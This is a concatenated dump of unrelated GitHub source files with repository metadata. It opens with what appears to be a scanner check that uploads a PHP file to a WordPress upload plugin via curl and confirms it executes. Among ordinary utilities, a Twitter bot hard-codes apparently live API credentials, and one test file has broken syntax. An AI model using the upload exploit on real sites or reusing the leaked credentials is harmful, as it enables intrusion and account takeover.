    filename = "Content-Disposition: backdoor.php"
    shell = "<?php echo md5(123)?>"
    code, head, res, _, _ = curl.curl('-H \'%s\' -d \'%s\' %s' % (filename, shell, payload))
    uploadfile = 'wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php'
    code, head, res, _, _ = curl.curl(arg + uploadfile)
    # md5("123") in the response proves the uploaded file was executed.
    if code == 200 and '202cb962ac59075b964b07152d234b70' in res:
        security_hole("webshell url:%s" % (arg + uploadfile))
# Manual test entry point against a local target.
if __name__ == '__main__':
    from dummy import *
    audit(assign('wordpress', 'http://192.168.121.130/wordpress/')[1])
| [
"liyueke@huobi.com"
] | liyueke@huobi.com |
de16d21a45bf2064b1b6afc2ef1c5ced56181fb4 | d25a8e1be90d12ec087e2d97256c7476b5db6a7c | /Assignment-5/part1/file_generator.py | 3511f4c543548799e5732db28497c236c3bb7aa0 | [] | no_license | bendavp/cs4500-assignments | f5d585c7226497506d10b167274d197e7b7c0861 | c8d51efd2f5d2bca77748014833c6416f7b1f5c0 | refs/heads/master | 2022-07-29T15:42:13.786907 | 2020-05-18T22:44:10 | 2020-05-18T22:44:10 | 265,082,608 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,203 | py | #!/usr/bin/python
from random import random
from random import randint
from random import seed
from random import choice
import string
import sys
# Usage: file_generator.py <output_file.txt> <num_rows>
# Writes a tab-separated file with 10 columns per row:
# three random ints, two floats, two 0/1 "bools", three random strings.
outFile = sys.argv[1]
numRows = int(sys.argv[2])
# for generating ints/floats/bools/strings
letters = string.ascii_letters
# Fixed seed so repeated runs produce identical files.
seed(1)
with open(outFile, "w") as f:
    for x in range(numRows):
        colsToAdd = []
        colsToAdd.append(str(randint(0,200))) # int col 1
        colsToAdd.append(str(randint(0,200))) # int col 2
        colsToAdd.append(str(randint(0,200))) # int col 3
        colsToAdd.append(str(random() * 200)) # float 4
        colsToAdd.append(str(random() * 200)) # float 5
        colsToAdd.append(str(randint(0,1))) # bool 6
        colsToAdd.append(str(randint(0,1))) # bool 7
        colsToAdd.append(''.join(choice(letters) for i in range(randint(3,20)))) # string 8
        colsToAdd.append(''.join(choice(letters) for i in range(randint(3,20)))) # string 9
        colsToAdd.append(''.join(choice(letters) for i in range(randint(3,20)))) # string 10
        f.write('\t'.join(colsToAdd) + '\n')
| [
"tang.amy@husky.neu.edu"
] | tang.amy@husky.neu.edu |
bbe5423c3579702ac9aedd2796d1d72907b0b9ac | 9ef923b4f24e1db90cc2904556fe30c4d99abff6 | /list-find.py | 8b60c224aa57c90952cb38c11ad5efd2c59bf10e | [] | no_license | magda-zielinska/python-level1 | f8ca551fb6b136a8eef51a24a617eea475c34b85 | c6a19b6d35a1b68ba6294e82074e3085e8d34c6f | refs/heads/master | 2021-10-21T07:43:37.666621 | 2019-03-03T11:00:21 | 2019-03-03T11:00:21 | 173,561,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
tofind = 5
found = False
for i in range(len(list)):
found = list[i] == tofind
if found:
if found:
print("Element found on index: ",i)
else:
print("absent")
# Count how many of the player's bets appear among the drawn numbers.
drawn = [5, 11, 9, 42, 3, 49]
bets = [3, 7, 11, 42, 34, 49]
hits = sum(1 for number in bets if number in drawn)
print(hits)
"zielinska.magdalen@gmail.com"
] | zielinska.magdalen@gmail.com |
893302d6151ff683089fe6f7d3fd8ab6e7f1dff7 | a6b83ca764b8e81b2f3dad64fad1fc4e5eaa2acb | /tests/github_api_test.py | 9c26c2552200ee9ca82849ae6f356308aea6ed41 | [
"MIT"
] | permissive | wilcarllopez/search-github | c919cfbc265c8915269d2bdc2a8a5fe8d02f509d | a6b6900458356fee9e04ced8373b83aca5d8887e | refs/heads/master | 2020-08-29T06:13:05.497151 | 2019-10-28T09:04:19 | 2019-10-28T09:04:19 | 217,951,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | py | import github_api
import pytest
import time
# Captured at import time so the assertion compares against the same minute
# the module under test uses. NOTE(review): can spuriously fail if a minute
# boundary is crossed between import and the call below.
timestr = time.strftime("%Y-%m-%d-%H-%M")


def test_timestamp_name():
    assert github_api.timestamp_name() == timestr


def test_main():
    # BUGFIX: the original file contained a bare `def test_main` line with
    # no parameter list or body, which is a SyntaxError. Stubbed out until
    # a real test for the main entry point is written.
    pass


if __name__ == '__main__':
    pytest.main()
"wilcarllopez@gmail.com"
] | wilcarllopez@gmail.com |
20d336dd81d1a78129de182250f5ee075f1ebcf2 | c1f6e3e590e735e89fcdefda914ab1eec914da2d | /src/python/design/1396_design_underground_system.py | 715d7811568134b99b7e9f85f7f9db01abdde0f6 | [] | no_license | alannesta/algo4 | eb1e3c64a6bf27f55bb6b0a16efc4188f5f97da4 | 46bd8d1b44cb19aa773cc072cc9be97e9a0e348d | refs/heads/master | 2022-11-28T14:33:44.863799 | 2022-11-25T22:02:03 | 2022-11-25T22:02:03 | 55,170,680 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,428 | py | """
https://leetcode.com/problems/design-underground-system/
"""
from collections import deque
class UndergroundSystem:
    """Tracks rider check-ins/check-outs and average travel time per route."""

    def __init__(self):
        # rider id -> (check-in station, check-in time), for riders in transit
        self.check_in = {}
        # (start station, end station) -> [total travel time, trip count]
        self.check_out = {}

    def checkIn(self, id: int, stationName: str, t: int) -> None:
        """Record that rider `id` entered `stationName` at time `t`."""
        self.check_in[id] = (stationName, t)

    def checkOut(self, id: int, stationName: str, t: int) -> None:
        """Complete rider `id`'s trip, folding it into the route statistics."""
        start_station, start_time = self.check_in.pop(id)
        route = (start_station, stationName)
        if route not in self.check_out:
            self.check_out[route] = [0, 0]
        self.check_out[route][0] += t - start_time
        self.check_out[route][1] += 1

    def getAverageTime(self, startStation: str, endStation: str) -> float:
        """Return the mean travel time over all completed trips on the route."""
        total, count = self.check_out[(startStation, endStation)]
        return total / count
# Your UndergroundSystem object will be instantiated and called as such:
"""
["UndergroundSystem","checkIn","checkIn","checkOut","checkIn","checkOut","checkOut","checkIn","getAverageTime","getAverageTime","checkIn","checkIn","getAverageTime"]
[[],[596854,"EQH524YN",13],[29725,"Y1A2ROGU",17],
[596854,"8AYN1B7O",115],[579716,"EQH524YN",145],[579716,"8AYN1B7O",199],
[29725,"8AYN1B7O",295],[939079,"16MTS56Z",371],["EQH524YN","8AYN1B7O"],
["Y1A2ROGU","8AYN1B7O"],[697035,"EQH524YN",442],[90668,"Y1A2ROGU",508],
["EQH524YN","8AYN1B7O"]]
"""
ops = ["UndergroundSystem", "checkIn", "checkIn", "checkOut", "checkIn", "checkOut", "checkOut", "checkIn",
       "getAverageTime", "getAverageTime", "checkIn", "checkIn", "getAverageTime"]
vals = [[], [596854, "EQH524YN", 13], [29725, "Y1A2ROGU", 17],
        [596854, "8AYN1B7O", 115], [579716, "EQH524YN", 145], [579716, "8AYN1B7O", 199],
        [29725, "8AYN1B7O", 295], [939079, "16MTS56Z", 371], ["EQH524YN", "8AYN1B7O"],
        ["Y1A2ROGU", "8AYN1B7O"], [697035, "EQH524YN", 442], [90668, "Y1A2ROGU", 508],
        ["EQH524YN", "8AYN1B7O"]]
obj = UndergroundSystem()
# Replay the recorded operations against a fresh system; the constructor
# entry ("UndergroundSystem", []) matches no branch and is skipped.
for name, args in zip(ops, vals):
    if name == 'checkIn':
        obj.checkIn(*args)
    elif name == 'checkOut':
        obj.checkOut(*args)
    elif name == 'getAverageTime':
        print(obj.getAverageTime(*args))
# obj.checkIn(id,stationName,t)
# obj.checkOut(id,stationName,t)
# param_3 = obj.getAverageTime(startStation,endStation)
| [
"alannestacao@gmail.com"
] | alannestacao@gmail.com |
837047daafa3fbf8fb518cb9e035f1e52f6c5d52 | b3763ef899a1edd70867937e4e52277eaf1aa131 | /twitter.py | 62cd8003b720c0d803a6d0d9f94564ec8270d9bf | [] | no_license | ShamarB/Twitter-Bot | 62085022b4f887f2a9000d53fc2682fae3a5fafb | 709f40a4406bc805e87325ebb89c63bbdd903b8d | refs/heads/main | 2022-12-31T00:19:55.873900 | 2020-10-18T19:49:14 | 2020-10-18T19:49:14 | 305,182,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | import tweepy
import time
# SECURITY WARNING: real API credentials are hard-coded below. Anyone with
# read access to this file can control the associated Twitter account.
# They should be revoked and loaded from environment variables instead.
auth = tweepy.OAuthHandler('J0UjmyOsjZ7zYSpYnWrXNEOva',
                           'Kv2tI5Vv2NDPA0J4HI3RfbJCXr8XvJRYfx6byJOIxXecAXbZWD')
auth.set_access_token('1256998173513601025-a66icjGaHBv1JvuJiLKhhkVz9ShEqG',
                      '0KT5p6UZIH7ULjN6Zv9nYnXwjwd77SAqzGAvg8PV4Zv7z')
# Respect Twitter's rate limits by waiting (and logging) when they are hit.
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
user = api.me()
print(user.screen_name)
# List the accounts this user follows.
for friends in tweepy.Cursor(api.friends).items():
    print(friends.name)
search = 'Lakers'
nrTweets = 1
for tweet in tweepy.Cursor(api.search, search).items(nrTweets):
    try:
        # NOTE(review): the message says "liked" but the call below retweets.
        print('tweet was liked')
        tweet.retweet()
        time.sleep(5)
    except tweepy.TweepError as e:
        print(e.reason)
    except StopIteration:
        break
| [
"noreply@github.com"
] | noreply@github.com |
7f719fe21255f1516a7e17bf22bfd468c890e9fc | 62451177214eb0a3cfc8f0b89b2a14ab898bf533 | /lecture_7/server_multi.py | ca5cd412efb4d4ee72b0ccda3dfc7479b0db449c | [] | no_license | ethanbar11/python_advanced_course1 | af4b0e20e640bda4d69986abb67958bd4eb181a1 | 05e7ce5c47aecc209f3540e66e180fd1da7b0282 | refs/heads/master | 2023-01-03T20:56:37.135804 | 2020-11-03T19:08:31 | 2020-11-03T19:08:31 | 293,882,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,231 | py | import threading
import socket
import time
import python_advanced_course1.lecture_5.FILE_DAL as DAL
from queue import Queue
# Chat server: listens on localhost and relays messages between clients.
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('127.0.0.1', 8089))
serversocket.listen(5)  # become a server socket, maximum 5 connections
print("Started listening!")
# Messages received from any client, waiting to be broadcast.
msg_queue = Queue()
# All connected client sockets (shared with the broadcast thread).
client_sockets = []
def receiving_from_certain_client(client_socket):
    """Receive messages from one client and push them onto the shared queue.

    Runs until the peer closes the connection, signalled by recv()
    returning empty bytes.
    """
    while True:
        msg = client_socket.recv(1024)
        # BUGFIX: the original compared `msg != ''` — bytes against str —
        # which is always True in Python 3, so the loop never terminated
        # when the client disconnected (recv returns b'').
        if not msg:
            break
        msg_queue.put(msg.decode())
def sending_from_queue():
    """Forever: pop the next queued message and send it to every client.

    Queue.get() blocks until a message is available, so the loop idles
    cheaply when there is no traffic.
    """
    while True:
        msg = msg_queue.get()
        # NOTE(review): loop variable shadows the imported `socket` module.
        for socket in client_sockets:
            socket.send(msg.encode())
# Background thread that broadcasts queued messages to every client.
sending_from_queue_thread = threading.Thread(target=sending_from_queue)
sending_from_queue_thread.start()
# Accept loop: each new connection gets its own receiving thread.
while True:
    client_socket, address = serversocket.accept()
    client_sockets.append(client_socket)
    client_socket_thread = threading.Thread(target=receiving_from_certain_client,
                                            args=(client_socket,))
    client_socket_thread.start()
| [
"ethanbarbar@gmail.com"
] | ethanbarbar@gmail.com |
5979042ecef7aab7fc251af4efd1c0f05b6ca7eb | 9a28e0cecdf71cdb4eccdfc7df2554bd421fa69f | /src/hio/core/udp/udping.py | bff163c93346be5c63bb8cf904ea68b1a1ca4e35 | [
"Apache-2.0"
] | permissive | cellofellow/hio | a1700f3c8abc8100926dc4fc0af87efc294f6917 | 1296d196543ad01829dcb86844dfd5881af5a038 | refs/heads/master | 2023-04-04T01:27:01.449465 | 2021-04-08T17:26:01 | 2021-04-08T17:26:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,837 | py | # -*- encoding: utf-8 -*-
"""
hio.core.udping Module
"""
import sys
import os
import errno
import socket
from binascii import hexlify
UDP_MAX_DATAGRAM_SIZE = (2 ** 16) - 1 # 65535
UDP_MAX_SAFE_PAYLOAD = 548 # IPV4 MTU 576 - udp headers 28
# IPV6 MTU is 1280 but headers are bigger
UDP_MAX_PACKET_SIZE = min(1024, UDP_MAX_DATAGRAM_SIZE) # assumes IPV6 capable equipment
class SocketUdpNb(object):
    """
    Class to manage non blocking I/O on UDP socket.

    Wraps a datagram socket with non-blocking open/receive/send helpers and
    optional over-the-wire logging through a WireLog instance.
    """
    def __init__(self,
                 ha=None,
                 host='',
                 port=55000,
                 bufsize=1024,
                 wl=None,
                 bcast=False):
        """
        Initialization method for instance.
        ha = host address duple (host, port); overrides host/port if given
        host = '' equivalant to any interface on host
        port = socket port
        bufsize = socket send/receive buffer size in bytes
        wl = WireLog instance ref for debug logging or over the wire tx and rx
        bcast = Flag if True enables sending to broadcast addresses on socket
        """
        self.ha = ha or (host, port) # ha = host address duple (host, port)
        self.bs = bufsize
        self.wl = wl
        self.bcast = bcast
        self.ss = None #server's socket needs to be opened
        self.opened = False

    def actualBufSizes(self):
        """
        Returns duple of the the actual socket send and receive buffer size
        (send, receive)
        """
        if not self.ss:
            return (0, 0)
        return (self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF),
                self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF))

    def open(self):
        """
        Opens socket in non blocking mode.

        Returns True on success, False if the bind failed.

        if socket not closed properly, binding socket gets error
        socket.error: (48, 'Address already in use')
        """
        #create socket ss = server socket
        self.ss = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        if self.bcast: # enable sending to broadcast addresses
            self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        # make socket address reusable. doesn't seem to have an effect.
        # the SO_REUSEADDR flag tells the kernel to reuse a local socket in
        # TIME_WAIT state, without waiting for its natural timeout to expire.
        # may want to look at SO_REUSEPORT
        self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # Grow kernel buffers to at least the configured buffer size.
        if self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF) < self.bs:
            self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.bs)
        if self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF) < self.bs:
            self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.bs)
        self.ss.setblocking(0) #non blocking socket

        #bind to Host Address Port
        try:
            self.ss.bind(self.ha)
        except socket.error as ex:
            # NOTE(review): `console` is not imported in this module's
            # visible imports — presumably ioflo's consoling console.
            # Confirm, otherwise this error path raises NameError.
            console.terse("socket.error = {0}\n".format(ex))
            return False

        self.ha = self.ss.getsockname() #get resolved ha after bind
        self.opened = True
        return True

    def reopen(self):
        """
        Idempotently open socket
        """
        self.close()
        return self.open()

    def close(self):
        """
        Closes socket and logs if any
        """
        if self.ss:
            self.ss.close() #close socket
            self.ss = None
            self.opened = False

    def receive(self):
        """
        Perform non blocking read on  socket.

        returns tuple of form (data, sa)
        if no data then returns (b'',None)
        but always returns a tuple with two elements
        """
        try:
            data, sa = self.ss.recvfrom(self.bs)  # sa is source (host, port)
        except socket.error as ex:
            # ex.args[0] is always ex.errno for better compat
            if ex.args[0] in (errno.EAGAIN, errno.EWOULDBLOCK):
                return (b'', None) #receive has nothing empty string for data
            else:
                emsg = "socket.error = {0}: receiving at {1}\n".format(ex, self.ha)
                console.profuse(emsg)
                raise #re raise exception ex1

        # Verbose debug logging of the received payload (hex if not UTF-8).
        if console._verbosity >= console.Wordage.profuse:  # faster to check
            try:
                load = data.decode("UTF-8")
            except UnicodeDecodeError as ex:
                load = "0x{0}".format(hexlify(data).decode("ASCII"))
            cmsg = ("Server at {0}, received from {1}:\n------------\n"
                        "{2}\n\n".format(self.ha, sa, load))
            console.profuse(cmsg)

        if self.wl:  # log over the wire rx
            self.wl.writeRx(data, who=sa)

        return (data, sa)

    def send(self, data, da):
        """
        Perform non blocking send on  socket.

        data is string in python2 and bytes in python3
        da is destination address tuple (destHost, destPort)

        Returns the number of bytes actually sent.
        """
        try:
            result = self.ss.sendto(data, da) #result is number of bytes sent
        except socket.error as ex:
            emsg = "socket.error = {0}: sending from {1} to {2}\n".format(ex, self.ha, da)
            console.profuse(emsg)
            result = 0
            raise

        # Verbose debug logging of the sent payload (hex if not UTF-8).
        if console._verbosity >=  console.Wordage.profuse:
            try:
                load = data[:result].decode("UTF-8")
            except UnicodeDecodeError as ex:
                load = "0x{0}".format(hexlify(data[:result]).decode("ASCII"))
            cmsg = ("Server at {0}, sent {1} bytes to {2}:\n------------\n"
                    "{3}\n\n".format(self.ha, result, da, load))
            console.profuse(cmsg)

        if self.wl:
            self.wl.writeTx(data[:result], who=da)

        return result
PeerUdp = SocketUdpNb  # alias retained for backwards compatibility
| [
"smith.samuel.m@gmail.com"
] | smith.samuel.m@gmail.com |
9e632c4957701975b56b0cf5058c385bbb10f102 | a1cc4d924019b4afc952ca70686b1950d3ce9890 | /ts_ws/src/villa_sound/calibration/tsp_gen.py | a2933fb0d1d03e293d8bcb9fdb4d6f8c5ceed186 | [
"MIT"
] | permissive | dsadhvi/Robot-Says-Hello | 95f06d6a905805b64f4aaca68f5abc3156bba9f4 | 3c3884ed521d19951190b0e9b000ea7e7bf15950 | refs/heads/master | 2020-03-31T01:06:35.628243 | 2018-10-05T20:49:23 | 2018-10-05T20:49:23 | 151,767,056 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,528 | py | # -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
def get_tsp(N, Fs, flg_ud=1, flg_eval=0):
    """Generate a (Time-Stretched Pulse, inverse TSP) signal pair.

    N: signal length in samples; must be a power of 2 and >= 512
    Fs: sample rate in Hz (used for the time axis and the spectrogram)
    flg_ud: sweep direction flag, 1 or 0
    flg_eval: if truthy, plot the signals and the TSP*iTSP impulse check
    Returns (tsp_sig, itsp_sig) on success, or 0 on invalid input.

    NOTE(review): this is Python 2 code (print statements, integer N/2
    division); it will not run unmodified on Python 3.
    """
    if np.log2(N) != int(np.log2(N)):
        print "TSP length must be power of 2"
        return 0
    elif N<512:
        print "TSP length is too small"
        return 0
    if flg_ud != 1 and flg_ud != 0:
        print "TSP up and down flag is invalied"
        return 0

    # TSP parameters
    # Stretch factor chosen per length; lengths above 16384 use the maximum.
    N_set = [512, 1024, 2048, 4096, 8192, 16384]
    stretch_set = [7, 10, 12, 13, 14, 15]
    if N in N_set:
        stretch = float(stretch_set[N_set.index(N)])
    elif N>16384:
        stretch = 15.0
    M = int((stretch/32.0)*float(N))
    t = [float(ind)/float(Fs) for ind in range(0,N)]

    # Build the TSP spectrum and its exact inverse (reciprocal) spectrum,
    # enforcing conjugate symmetry so the time signals are real.
    tsp_spec = np.zeros(N, dtype=complex)
    itsp_spec = np.zeros(N, dtype=complex)
    tsp_spec[0] = 1
    tsp_spec[N/2] = np.exp(float(flg_ud*2-1)*1j*float(M)*np.pi)
    itsp_spec[0] = 1.0/tsp_spec[0]
    itsp_spec[N/2] = 1.0/tsp_spec[N/2]
    for i in np.arange(1,N/2):
        tsp_spec[i] = np.exp(float(flg_ud*2-1)*1j*4*float(M)*np.pi*(float(i-1)**2)/(float(N)**2))
        itsp_spec[i] = 1.0/tsp_spec[i]
        tsp_spec[N-i] = np.conjugate(tsp_spec[i])
        itsp_spec[N-i] = 1.0/tsp_spec[N-i]

    tsp_sig = (np.fft.ifft(tsp_spec,N)).real
    itsp_sig = (np.fft.ifft(itsp_spec,N)).real

    # Circular shift
    # Center the sweep; TSP and inverse are shifted in opposite directions.
    if flg_ud == 1:
        tsp_sig = np.roll(tsp_sig, -(N/2-M))
        itsp_sig = np.roll(itsp_sig, N/2-M)
    elif flg_ud == 0:
        tsp_sig = np.roll(tsp_sig, N/2-M)
        itsp_sig = np.roll(itsp_sig, -(N/2-M))

    # Evaluation
    # Convolving TSP with its inverse should give a unit impulse.
    if flg_eval:
        print "Evaluating TSP signal..."
        imp_eval_spec = np.fft.fft(tsp_sig,N)*np.fft.fft(itsp_sig,N)
        imp_eval = np.fft.ifft(imp_eval_spec,N)
        imp_eval_power = 20*np.log10(np.roll(np.abs(imp_eval), N/2))

        plt.figure()
        plt.plot(t, tsp_sig)
        plt.xlabel("Time [s]")
        plt.ylabel("Amplitude")

        plt.figure()
        plt.plot(t, itsp_sig)
        plt.xlabel("Time [s]")
        plt.ylabel("Amplitude")

        stft_len = 256
        stft_overlap = 128
        stft_win = np.hamming(stft_len)
        plt.figure()
        pxx, stft_freq, stft_bin, stft_t = plt.specgram(tsp_sig, NFFT=stft_len, Fs=Fs, window=stft_win, noverlap=stft_overlap)
        plt.axis([0, N/Fs, 0, Fs/2])
        plt.xlabel("Time [s]")
        plt.ylabel("Frequency [Hz]")

        plt.figure()
        plt.plot(imp_eval_power)
        plt.ylabel("[dB]")
        #plt.show()

    return (tsp_sig, itsp_sig)
| [
"tracyzhang98@gmail.com"
] | tracyzhang98@gmail.com |
4d3c277d48f00fc1623f502f3285e30fdd567644 | 355a9053a17ced7d076e6fb519c57d04eedb15cc | /logger_test/logger_test/views.py | b00bb60d1a1a8e966f7fd1646710d0082e3aeb74 | [] | no_license | prafulbagai/seynse_logger | 7bbdafcd64e7117a08020e4d1dd1095959063820 | e40999855609cd74dc2d650bb8e24192d809e9fd | refs/heads/master | 2023-05-26T22:14:49.584008 | 2020-09-09T07:49:11 | 2020-09-09T07:49:11 | 215,993,615 | 0 | 0 | null | 2023-05-22T23:55:30 | 2019-10-18T09:53:53 | Python | UTF-8 | Python | false | false | 612 | py | import seynse_logger
from django.http.response import HttpResponse
import logging
try:
from django.views import View
except ImportError:
# for django >= 1.8
from django.views.generic import View
logger = logging.getLogger('test')
class Testview(View):
    """Exercise seynse_logger's global-log API from a single GET request."""

    def get(self, request, **kwargs):
        # Start from a clean slate, attach a mix of value types as global
        # log context, emit one record, then clean up again.
        seynse_logger.clear_global_log()
        seynse_logger.set_global_logs(
            {'c': {'x': object}, 'C': "something else", 'INT': 10, 'FLOAT': 9.32, 'a': "some text"})
        logger.info("Just to test global logs.")
        seynse_logger.clear_global_log()
        return HttpResponse()
| [
"praful.bagai1991@gmail.com"
] | praful.bagai1991@gmail.com |
fcbbaec32e58baf63051f622962e9ba754e5e366 | 908655251066427f654ee33ebdf804f9f302fcc3 | /Tests/Pedestrian/Pedestrian_AS.py | 6fca7c3c2b9f432c82c945dd4a51c48690014dc8 | [] | no_license | maxiaoba/MCTSPO | be567f80f1dcf5c35ac857a1e6690e1ac599a59d | eedfccb5a94e089bd925b58f3d65eef505378bbc | refs/heads/main | 2023-07-05T02:20:16.752650 | 2021-07-06T06:04:40 | 2021-07-06T06:04:40 | 381,811,407 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,548 | py | import mcts.AdaptiveStressTestingActionSpace as AST_AS
# Stress test of the AV/pedestrian scenario using the action-space variant of
# Adaptive Stress Testing (AST) driven by MCTS with double progressive widening.
import mcts.ASTSim as ASTSim
import mcts.MCTSdpw as MCTSdpw
import mcts.AST_MCTS as AST_MCTS
import numpy as np
from Pedestrian.av_simulator import AVSimulator
from Pedestrian.av_reward import AVReward
from Pedestrian.av_spaces import AVSpaces
from mylab.envs.ast_env import ASTEnv
import math

np.random.seed(0)  # fixed seed for reproducible runs

# Search configuration.
max_path_length = 50   # maximum number of simulation steps per rollout
ec = 100.0             # MCTS exploration constant
n = 160                # number of MCTS iterations
top_k = 10             # number of best action sequences to keep
RNG_LENGTH = 2         # NOTE(review): unused below -- possibly leftover; confirm
SEED = 0               # NOTE(review): unused below -- np.random.seed(0) is used instead

reward_function = AVReward()
spaces = AVSpaces(interactive=True)
sim = AVSimulator(use_seed=False, spaces=spaces, max_path_length=max_path_length)
env = ASTEnv(interactive=True,
             sample_init_state=False,
             s_0=[-0.5, -4.0, 1.0, 11.17, -35.0],  # fixed initial scenario state
             simulator=sim,
             reward_function=reward_function,
             )

ast_params = AST_AS.ASTParams(max_path_length)
ast = AST_AS.AdaptiveStressTestAS(ast_params, env)
# DPW parameters are positional; see MCTSdpw.DPWParams for the field meanings.
macts_params = MCTSdpw.DPWParams(max_path_length, ec, n, 0.5, 0.85, 1.0, 0.0, True, 1.0e308, np.uint64(0), top_k)

stress_test_num = 2
if stress_test_num == 2:
    result = AST_MCTS.stress_test2(ast, macts_params, False)
else:
    result = AST_MCTS.stress_test(ast, macts_params, False)

print("step count: ", ast.step_count)  # fixed typo: was "setp count"
# Replay each returned action sequence and compare predicted vs. actual reward.
for (i, action_seq) in enumerate(result.action_seqs):
    reward, _ = ASTSim.play_sequence(ast, action_seq, sleeptime=0.0)
    print("predicted reward: ", result.rewards[i])  # fixed typo: was "predic reward"
    print("actual reward: ", reward)
| [
"xiaobaima@DNab421bb2.stanford.edu"
] | xiaobaima@DNab421bb2.stanford.edu |
f44a5ef509cc3d410ad21ed3d5894b8dd2dd39a1 | 3795492e4e54fa58f31d60f52b13029743ac46c5 | /texttospeech.py | 8c5784873a4053e417f9637e48cbab1e8ba9e1c4 | [] | no_license | suyogsrajput/speechrecognition | 25d285cc81b4d9a72d0d201c14fca4845bc6da41 | f74f51925e2ec55deb8d29b7ca28578588bccdef | refs/heads/main | 2023-05-14T03:04:17.596347 | 2021-06-07T09:37:59 | 2021-06-07T09:37:59 | 370,767,772 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,111 | py | #import libraries
from tkinter import *
from gtts import gTTS
from playsound import playsound
import speech_recognition as sr
import os
#Initialized window
root = Tk()
root.geometry('450x400')
root.iconbitmap('voice.ico')
root.resizable(False, False)
root.config(bg = 'slate blue')
root.title('Speech Recognition')
##heading
Label(root, text = 'Text to Speech' ,cursor="xterm", font='times 20 bold underline' , bg ='slate blue').pack()
Label(root, text ='Suyog Singh Rajput' ,cursor="xterm", font ='times 12 bold', bg = 'slate blue').pack(side = BOTTOM)
Label(root, text ='LN18BTCS1020' ,cursor="xterm", font ='times 10 bold', bg = 'slate blue').pack(side = BOTTOM)
#label
Label(root, text ='Enter Text-',cursor="xterm", font ='times 15 bold', bg ='slate blue').place(x=20,y=60)
#text variable
Msg = StringVar()
#Entry
entry_field = Entry(root,textvariable =Msg, width ='60')
entry_field.place(x=20 , y=100)
#define function
def texttospeech():
    """Synthesize the entry-field text with gTTS, save it as speech.mp3 and play it.

    Does nothing when the entry field is empty or whitespace-only, since gTTS
    rejects empty text and the resulting exception would surface inside the
    Tk button callback.
    """
    Message = entry_field.get()
    if not Message.strip():
        return  # nothing to speak
    speech = gTTS(text = Message)
    speech.save('speech.mp3')
    playsound('speech.mp3')
def Exit():
    """Close the application window and delete the generated audio file, if any."""
    root.destroy()
    # Guard the delete: speech.mp3 only exists after PLAY has been used at
    # least once; without the guard os.remove raises FileNotFoundError.
    if os.path.exists('speech.mp3'):
        os.remove('speech.mp3')
def Reset():
    """Clear the text entry and delete the generated audio file, if any."""
    Msg.set("")
    # Same guard as Exit: pressing RESET before PLAY used to crash with
    # FileNotFoundError because speech.mp3 had not been created yet.
    if os.path.exists('speech.mp3'):
        os.remove('speech.mp3')
def speechtotext():
    """Tear down this window and open the speech-to-text screen."""
    root.destroy()
    import speechtotext as st
    # NOTE(review): bare attribute access, not a call -- presumably the
    # speechtotext module builds its UI at import time; confirm that
    # `st.speechtotext` was not meant to be invoked as a function.
    st.speechtotext
def main():
    """Tear down this window and return to the main menu.

    The main-menu module is presumably expected to start its own UI on
    import -- nothing here calls into it after the import.
    """
    root.destroy()
    import main
# Action buttons: PLAY/RESET/EXIT act on the current text; the last two
# switch screens. All widgets use absolute positioning via place().
Button(root, text = "PLAY" ,cursor="hand2", font = 'times 15 bold', command = texttospeech, bg = 'MediumOrchid1').place(x=25, y=150)
Button(root,text = 'EXIT',cursor="hand2",font = 'times 15 bold' ,relief=SUNKEN, command = Exit, bg = 'firebrick1',fg = "yellow").place(x=190 , y =150)
Button(root, text = 'RESET',cursor="hand2", font='times 15 bold', command = Reset, bg = 'MediumOrchid1').place(x=102,y=150)
Button(root, text = "Speech To Text" ,cursor="hand2", font = 'times 16 bold', command = speechtotext, bg = 'MediumOrchid1',fg = "white").place(x=25, y=200)
Button(root,text = 'Main Menu',cursor="hand2",font = 'times 15 bold' , command = main, bg = 'MediumOrchid1',fg = "white").place(x=190 , y =200)
# Enter the Tk event loop; blocks until the window is destroyed.
root.mainloop()
| [
"37499425+suyogsrajput@users.noreply.github.com"
] | 37499425+suyogsrajput@users.noreply.github.com |
24f18f2f5ba05f52b01dba5c980b7d7789d33f9a | 2ae95f690e0ed16a730aee9544b4b8f63789a0a4 | /tsv/verify_tnTSV.py | 0d6db7fc6de50f0adf8d4c2f25a542da362e6912 | [
"MIT"
] | permissive | unfoldingWord-dev/tools | 9f147672719e9e570f9f39cf38f915a9b4c25b64 | f337286a99e11d5ceb1537bff07ee10f0d6c07ed | refs/heads/develop | 2023-08-09T15:00:16.883806 | 2023-07-31T19:43:53 | 2023-07-31T19:43:53 | 11,344,473 | 7 | 14 | NOASSERTION | 2022-12-11T08:05:58 | 2013-07-11T14:44:36 | Python | UTF-8 | Python | false | false | 28,817 | py | # -*- coding: utf-8 -*-
# Python 3 script for verifying proper format of each row in a TSV tN file.
# In a TSV file, column 9 (OccurrenceNote) corresponds to a single tN file in markdown format.
# Within that field line breaks are coded as <br>, not newline characters.
# A newline terminates the entire row.
# The script checks each row for the following:
# Wrong number of columns, should be 9 per row.
